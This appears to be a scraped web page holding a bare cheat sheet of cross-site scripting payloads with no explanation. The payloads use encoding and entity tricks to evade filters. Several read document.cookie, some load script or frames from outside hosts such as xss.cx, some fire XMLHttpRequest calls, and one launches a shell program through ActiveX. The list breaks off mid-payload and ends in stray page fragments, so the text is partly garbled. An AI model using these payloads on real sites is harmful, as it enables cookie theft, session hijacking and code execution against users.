<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B'>xss <a [\x0B]onmosemove=confirm('\Done\')> <a[\x0B] onmouseover =location=’jav\x41script\x3aconfirm\x28″ZDresearch”\x29′>ZDresearch <body language=vbs onload=confirm-1 <body language=vbs onload=confirm-1 <body language=vbs onload=confirm-1 "><body language=vbs onload=window.location='http://xss.cx'> <body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> <body scroll=confirm(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <body/onload=<!-->&#10confirm(1)> <body/onload=<!-->&#10confirm(1)> "<body/onload=<!-->&#10confirm(1);prompt(/XSS/.source)>" "\"><body/onload=<!-->&#10confirm(1);prompt(/XSS/.source)>", <body/onload=<!-->&#10confirm(1);prompt(/XSS/.source)> ><body/onload=<!-->&#10confirm(1);prompt(/XSS/.source)> <button autofocus onfocus=confirm(2)> <button onclick="window.open('http://xss.cx/::Error138 ');">CLICKME "<button>'><img src=x onerror=confirm(0);></button>" <button>'><img src=x onerror=confirm(0);></button> charset=utf- '`"><*chr*script>log(*num*)</script> <command onmouseover="javascript:confirm(0);">Save // <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button>?f <div contextmenu=x>right-click<menu id=x onshow=confirm(1)> <div id="confirm(2)" style="x:expression(eval)(id)"> <div onmouseover='confirm&lpar;1&rpar;'>DIV</div> <div onmouseover='confirm&lpar;1&rpar;'>DIV</div> <div style="color:rgb(''�x:expression(confirm(URL=1))"></div> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button> <%div%20style=xss:expression(prompt(1))> <div/onmouseover='confirm(1)'> style="x:"> <div/onmouseover='confirm(1)'> style="x:"> <div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div> <div/style="width:expression(confirm(1))">X</div> <embed code="http://xss.cx/xss.swf" allowscriptaccess=always></embed> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.cx/xss.js></SCRIPT>'"--> exp/*<XSS STYLE='no\xss:noxss("*//*"); </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); <form action='data:text&sol;html,<script>confirm(1)&lt/script&gt'><button>CLICK <form action='java&Tab;scri&Tab;pt:confirm(1)'><button>CLICK <form action="javas&Tab;cript:confirm(1)" method="get"><input type="submit" value="Submit"></form> <form id="myform" value="" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>confirm(1)</textarea><input type="submit" value="Absenden"></form> <form name=location > <form><a href="javascript:\u0061lert(1)">X <form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)><button/type=submit> <form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)><button/type=submit> <form/action=javascript:eval(setTimeout(confirm(1)))><input/type=submit> //<form/action=javascript:confirm&lpar;document&period;cookie&rpar;><input/type='submit'>// <form><button formaction=javascript&colon;confirm(1)>CLICKME <form><iframe src="javascript:confirm(1)" ;> <form><input type=submit formaction=//xss.cx><textarea name=x> <form><isindex formaction="javascript&colon;confirm(1)" <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <frameset><frame/src=//xss.cx> &gt > http://www.google<script .com>confirm(document.location)</script http://www.<script abc>setTimeout('confirm(1)',1)</script .com> http://www.<script>confirm(1)</script .com <!--[if WindowsEdition]><script>confirm(location);</script><![endif]--> <!--[if<img src=x:x onerror=confirm(5)//]--> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); confirm(Safe.get());</script> <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> <iframe src="" onmouseover="confirm(document.cookie)"> <iframe src="#" style=width:exp/**/ressi/**/on(confirm(1))> <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src="data:D,<script>confirm(top.document.body.innerHTML)</script>"> <iframe src="data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E"></iframe> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'> <iframe srcdoc='<svg/onload=confirm(3)>'> <iframe srcdoc="<svg/onload=confirm(domain)>"> <iframe src="http://xss.cx?x=<iframe name=x></iframe>"></iframe><a href="http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script> <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <iframe src=javascript&colon;confirm&lpar;document&period;location&rpar;> <iframe src="javascript:'<script src=http://xss.cx ></script>'"></iframe> "><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <iframe width=0 height=0 src="javascript:confirm(1)"> <iframe/%00/ src=javaSCRIPT&colon;confirm(1) "><iframe%20src="http://google.com"%%203E iframe.contentWindow.location.constructor.prototype <iframe><iframe src=javascript:confirm(4)></iframe> <iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";> <iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";> "><iframe/onreadystatechange=confirm(1) <iframe/onreadystatechange=confirm(1) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> "><iframe/src \/\/onload = prompt(1) <iframe/src \/\/onload = prompt(1) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <iframe/src="data:text/html,<svg onload=confirm(1)>"> /*iframe/src*/<iframe/src="<iframe/[email protected]"/onload=prompt(1) /*iframe/src*/> <iframe/src=j&Tab;av&Tab;as&Tab;cri&Tab;pt&Tab;:co&Tab;nfir&Tab;m&Tab;(&Tab;&Tab;1&Tab;)> <iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'> <iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'> <!--[if]><script>confirm(1)</script --> <img language=vbs src=<b onerror=confirm#1/1#> "><img src="/" =_=" title="onerror='prompt(1)'"> <img src="/" =_=" title="onerror='prompt(1)'"> <img src ?itworksonchrome?\/onerror = confirm(1) <img src ?itworksonchrome?\/onerror = confirm(1)??? “><img src= onerror=confirm(1)> <img src=//\ onload=confirm(1)> <img src=`%00`&NewLine; onerror=confirm(1)&NewLine; <img src=1 onerror=Function("aler"+"t(documen"+"t.domain)")()> "]<img src=1 onerror=confirm(1)> /#<img src=1 onerror=javascript:confirm(3)> <img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))> <img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> # "><img src=javascript:while([{}]);> <img src=javascript:while([{}]);> <img/ src//'onerror/''/=confirm(1)//'> <img src=test.jpg?value=">Yes, we are still inside a tag!"> <img src=x on*chr*Error="javascript:log(*num*)"/> <img src=x on*chr*Error="javascript:log(*num*)"/> <img src=x onerror=URL='javascript:confirm(1)'> "\"><img src=\"x\" onerror=\"confirm(0)\"/>", ><img src=\"x\" onerror=\"confirm(0)\"/> <img src=x onerror='confirm(domain+/ -- /+cookie)'>"> <img src=x onerror='confirm(domain+/ -- /+cookie)'>"> "><img src=x onerror=confirm('x') />] "><img src=x onerror=confirm(1); ... "><img src=x onerror=prompt(1);> "><img src=x onerror=prompt(document.location);>#"><img src=x onerror=prompt(document.location);> "><img src=x onerror=prompt("xss");>#"><img src=x onerror=prompt("xss");> "><img src=x onerror=window.open('https://www.google.com/');> "<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>" "\"><img src=x onerror=x.onerror=confirm(1);promp

    • 19
    •  
  • rc

    • 20
    • rc